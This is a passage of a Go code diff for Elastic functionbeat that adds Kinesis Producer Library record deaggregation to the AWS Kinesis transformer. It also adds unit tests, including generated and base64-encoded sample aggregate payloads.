+					"kinesis_sequence_number": *deaggRecord.SequenceNumber,
+					"kinesis_encryption_type": *deaggRecord.EncryptionType,
 				},
-				"event_id":                record.EventID,
-				"event_name":              record.EventName,
-				"event_source":            record.EventSource,
-				"event_source_arn":        record.EventSourceArn,
-				"event_version":           record.EventVersion,
-				"aws_region":              record.AwsRegion,
-				"message":                 string(record.Kinesis.Data),
-				"kinesis_partition_key":   record.Kinesis.PartitionKey,
-				"kinesis_schema_version":  record.Kinesis.KinesisSchemaVersion,
-				"kinesis_sequence_number": record.Kinesis.SequenceNumber,
-				"kinesis_encryption_type": record.Kinesis.EncryptionType,
-			},
+			})
 		}
 	}
-	return events
+	return events, nil
 }
 
 // CloudwatchKinesisEvent takes a Kinesis event containing Cloudwatch logs and creates events for all
diff --git a/x-pack/functionbeat/provider/aws/aws/transformer/transformer_test.go b/x-pack/functionbeat/provider/aws/aws/transformer/transformer_test.go
index 44657582a01a..373c7981c78c 100644
--- a/x-pack/functionbeat/provider/aws/aws/transformer/transformer_test.go
+++ b/x-pack/functionbeat/provider/aws/aws/transformer/transformer_test.go
@@ -5,10 +5,18 @@
 package transformer
 
 import (
+	"crypto/md5"
+	"encoding/base64"
+	"fmt"
+	"math/rand"
+	"strconv"
 	"testing"
 	"time"
 
 	"github.com/aws/aws-lambda-go/events"
+	"github.com/awslabs/kinesis-aggregation/go/deaggregator"
+	aggRecProto "github.com/awslabs/kinesis-aggregation/go/records"
+	"github.com/golang/protobuf/proto"
 	"github.com/stretchr/testify/assert"
 
 	"github.com/elastic/beats/v7/libbeat/beat"
@@ -61,51 +69,204 @@ func TestCloudwatch(t *testing.T) {
 }
 
 func TestKinesis(t *testing.T) {
-	request := events.KinesisEvent{
-		Records: []events.KinesisEventRecord{
-			events.KinesisEventRecord{
-				AwsRegion:      "us-east-1",
-				EventID:        "1234",
-				EventName:      "connect",
-				EventSource:    "web",
-				EventVersion:   "1.0",
-				EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
-				Kinesis: events.KinesisRecord{
-					Data:                 []byte("hello world"),
-					PartitionKey:         "abc123",
-					SequenceNumber:       "12345",
-					KinesisSchemaVersion: "1.0",
-					EncryptionType:       "test",
+	t.Run("when kinesis event is successful", func(t *testing.T) {
+		request := events.KinesisEvent{
+			Records: []events.KinesisEventRecord{
+				events.KinesisEventRecord{
+					AwsRegion:      "us-east-1",
+					EventID:        "1234",
+					EventName:      "connect",
+					EventSource:    "web",
+					EventVersion:   "1.0",
+					EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+					Kinesis: events.KinesisRecord{
+						Data:                 []byte("hello world"),
+						PartitionKey:         "abc123",
+						SequenceNumber:       "12345",
+						KinesisSchemaVersion: "1.0",
+						EncryptionType:       "test",
+					},
 				},
 			},
-		},
-	}
+		}
 
-	events := KinesisEvent(request)
-	assert.Equal(t, 1, len(events))
+		events, err := KinesisEvent(request)
+		assert.NoError(t, err)
+		assert.Equal(t, 1, len(events))
 
-	fields := common.MapStr{
-		"cloud": common.MapStr{
-			"provider": "aws",
-			"region":   "us-east-1",
-		},
-		"event": common.MapStr{
-			"kind": "event",
-		},
-		"event_id":                "1234",
-		"event_name":              "connect",
-		"event_source":            "web",
-		"event_source_arn":        "arn:aws:iam::00000000:role/functionbeat",
-		"event_version":           "1.0",
-		"aws_region":              "us-east-1",
-		"message":                 "hello world",
-		"kinesis_partition_key":   "abc123",
-		"kinesis_schema_version":  "1.0",
-		"kinesis_sequence_number": "12345",
-		"kinesis_encryption_type": "test",
-	}
+		fields := common.MapStr{
+			"cloud": common.MapStr{
+				"provider": "aws",
+				"region":   "us-east-1",
+			},
+			"event": common.MapStr{
+				"kind": "event",
+			},
+			"event_id":                "1234",
+			"event_name":              "connect",
+			"event_source":            "web",
+			"event_source_arn":        "arn:aws:iam::00000000:role/functionbeat",
+			"event_version":           "1.0",
+			"aws_region":              "us-east-1",
+			"message":                 "hello world",
+			"kinesis_partition_key":   "abc123",
+			"kinesis_schema_version":  "1.0",
+			"kinesis_sequence_number": "12345",
+			"kinesis_encryption_type": "test",
+		}
+
+		assert.Equal(t, fields, events[0].Fields)
+	})
+
+	t.Run("when kinesis event with agg is successful", func(t *testing.T) {
+		rand.Seed(time.Now().UnixNano())
+		min, max := 2, 20
+		numRecords := rand.Intn(max-min) + min
+		aggRecBytes := generateKinesisAggregateRecord(numRecords, true)
+
+		request := events.KinesisEvent{
+			Records: []events.KinesisEventRecord{
+				events.KinesisEventRecord{
+					AwsRegion:      "us-east-1",
+					EventID:        "1234",
+					EventName:      "connect",
+					EventSource:    "web",
+					EventVersion:   "1.0",
+					EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+					Kinesis: events.KinesisRecord{
+						Data:                 aggRecBytes,
+						PartitionKey:         "ignored",
+						SequenceNumber:       "12345",
+						KinesisSchemaVersion: "1.0",
+						EncryptionType:       "test",
+					},
+				},
+			},
+		}
+
+		events, err := KinesisEvent(request)
+		assert.NoError(t, err)
+		assert.Equal(t, numRecords, len(events))
+
+		envelopeFields := common.MapStr{
+			"cloud": common.MapStr{
+				"provider": "aws",
+				"region":   "us-east-1",
+			},
+			"event": common.MapStr{
+				"kind": "event",
+			},
+			"event_id":                "1234",
+			"event_name":              "connect",
+			"event_source":            "web",
+			"event_source_arn":        "arn:aws:iam::00000000:role/functionbeat",
+			"event_version":           "1.0",
+			"aws_region":              "us-east-1",
+			"kinesis_schema_version":  "1.0",
+			"kinesis_sequence_number": "12345",
+			"kinesis_encryption_type": "test",
+		}
+
+		var expectedInnerFields []common.MapStr
+		for i := 0; i < numRecords; i++ {
+			expectedInnerFields = append(expectedInnerFields, common.MapStr{
+				"message":               fmt.Sprintf("%s %d", "hello world", i),
+				"kinesis_partition_key": fmt.Sprintf("%s %d", "partKey", i),
+			})
+		}
+
+		for i, expectedFields := range expectedInnerFields {
+			expectedFields.Update(envelopeFields)
+			assert.Equal(t, expectedFields, events[i].Fields)
+		}
+	})
+
+	t.Run("when kinesis event with agg is not successful", func(t *testing.T) {
+		aggRecBytes := generateKinesisAggregateRecord(2, false)
+
+		request := events.KinesisEvent{
+			Records: []events.KinesisEventRecord{
+				events.KinesisEventRecord{
+					AwsRegion:      "us-east-1",
+					EventID:        "1234",
+					EventName:      "connect",
+					EventSource:    "web",
+					EventVersion:   "1.0",
+					EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+					Kinesis: events.KinesisRecord{
+						Data:                 aggRecBytes,
+						PartitionKey:         "abc123",
+						SequenceNumber:       "12345",
+						KinesisSchemaVersion: "1.0",
+						EncryptionType:       "test",
+					},
+				},
+			},
+		}
 
-	assert.Equal(t, fields, events[0].Fields)
+		events, err := KinesisEvent(request)
+		assert.Error(t, err)
+		assert.Nil(t, events)
+	})
+
+	t.Run("when kinesis event with real example agg payload is successful", func(t *testing.T) {
+		rand.Seed(time.Now().UnixNano())
+		numRecords := 10
+		aggRecBytes, err := base64.StdEncoding.DecodeString("84mawgoIejJKSjl6dFgaEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg9" +
+			"7ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn" +
+			"0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn0aEwgAGg97ImtleSI6I" +
+			"nZhbHVlIn0aEwgAGg97ImtleSI6InZhbHVlIn3xj2DFMGZ0aNQC7aexsnkU")
+		assert.NoError(t, err)
+
+		request := events.KinesisEvent{
+			Records: []events.KinesisEventRecord{
+				events.KinesisEventRecord{
+					AwsRegion:      "us-east-1",
+					EventID:        "1234",
+					EventName:      "connect",
+					EventSource:    "web",
+					EventVersion:   "1.0",
+					EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+					Kinesis: events.KinesisRecord{
+						Data:                 aggRecBytes,
+						PartitionKey:         "ignored",
+						SequenceNumber:       "12345",
+						KinesisSchemaVersion: "1.0",
+						EncryptionType:       "test",
+					},
+				},
+			},
+		}
+
+		events, err := KinesisEvent(request)
+		assert.NoError(t, err)
+		assert.Equal(t, numRecords, len(events))
+
+		envelopeFields := common.MapStr{
+			"cloud": common.MapStr{
+				"provider": "aws",
+				"region":   "us-east-1",
+			},
+			"event": common.MapStr{
+				"kind": "event",
+			},
+			"event_id":                "1234",
+			"event_name":              "connect",
+			"event_source":            "web",
+			"event_source_arn":        "arn:aws:iam::00000000:role/functionbeat",
+			"event_version":           "1.0",
+			"aws_region":              "us-east-1",
+			"kinesis_schema_version":  "1.0",
+			"kinesis_sequence_number": "12345",
+			"kinesis_encryption_type": "test",
+			"kinesis_partition_key":   "z2JJ9ztX",
+			"message":                 `{"key":"value"}`,
+		}
+
+		for i := 0; i < numRecords; i++ {
+			assert.Equal(t, envelopeFields, events[i].Fields)
+		}
+	})
 }
 
 func TestCloudwatchKinesis(t *testing.T) {
@@ -203,3 +364,37 @@ ciJ9XX0=`),
 		assert.Equal(t, expectedFields, events[i].Fields)
 	}
 }
+
+func generateKinesisAggregateRecord(numRecords int, valid bool) []byte {
+	// Heavily based on https://github.com/awslabs/kinesis-aggregation/blob/master/go/deaggregator/deaggregator_test.go
+	aggRec := &aggRecProto.AggregatedRecord{}
+	unquotedHeader, err := strconv.Unquote(deaggregator.KplMagicHeader)
+	if err != nil {
+		panic(err)
+	}
+	aggRecBytes := []byte(unquotedHeader)
+	partKeyTable := make([]string, 0)
+	for i := 0; i < numRecords; i++ {
+		partKey := uint64(i)
+		hashKey := uint64(i)
+		r := &aggRecProto.Record{
+			ExplicitHashKeyIndex: &hashKey,
+			Data:                 []byte(fmt.Sprintf("%s %d", "hello world", i)),
+			Tags:                 make([]*aggRecProto.Tag, 0),
+		}
+		// This seems to be the only way to trigger the deaggregation module to return an error when needed
+		if valid {
+			r.PartitionKeyIndex = &partKey
+		}
+		aggRec.Records = append(aggRec.Records, r)
+		partKeyTable = append(partKeyTable, fmt.Sprintf("%s %d", "partKey", i))
+	}
+
+	aggRec.PartitionKeyTable = partKeyTable
+	data, _ := proto.Marshal(aggRec)
+	md5Hash := md5.Sum(data)
+	aggRecBytes = append(aggRecBytes, data...)
+	aggRecBytes = append(aggRecBytes, md5Hash[:]...)
+
+	return aggRecBytes
+}